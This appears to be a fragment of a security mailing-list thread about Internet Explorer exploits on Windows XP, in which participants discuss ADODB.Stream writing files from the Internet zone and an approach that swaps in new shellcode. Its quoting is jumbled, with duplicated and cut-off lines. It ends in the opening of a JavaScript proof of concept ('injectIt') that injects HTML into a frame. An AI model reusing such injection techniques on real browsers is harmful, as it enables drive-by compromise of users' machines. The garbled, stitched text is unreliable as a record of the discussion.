It is OK, but it causes a security alert on some
machines because of an "unsafe component". It isn't good
for us. But it is interesting that this security alert
is prompted only on some machines; on most WinXP machines,
cmd.exe will run without any prompt.
What is your idea?
--- Jelmer <[EMAIL PROTECTED]> wrote:
"Matthew Murphy" wrote:
> Well, the problem with ADODB.Stream wasn't executing files, it was writing
> them to disk. ...
Exactly.
ADODB.Stream is just doing what it is supposed to. The "problem" is
that code loaded from "the Internet zone" is just not supposed to be
allowed to get access
"Jelmer" writes:
> Because we avoid the adodb.stream issue altogether,
> You can patch it, but if you leave open other issues, well it's pointless
> Instead we just swap in this instead of the old shellcode:
[snip PoC]
Well, the problem with ADODB.Stream wasn't executing files, it was writing
th
Because we avoid the adodb.stream issue altogether,
You can patch it, but if you leave open other issues, well it's pointless
Instead we just swap in this instead of the old shellcode:
-- snip --
function injectIt() {
document.frames[0].document.body.insertAdjacentHTML('afterBegin','injected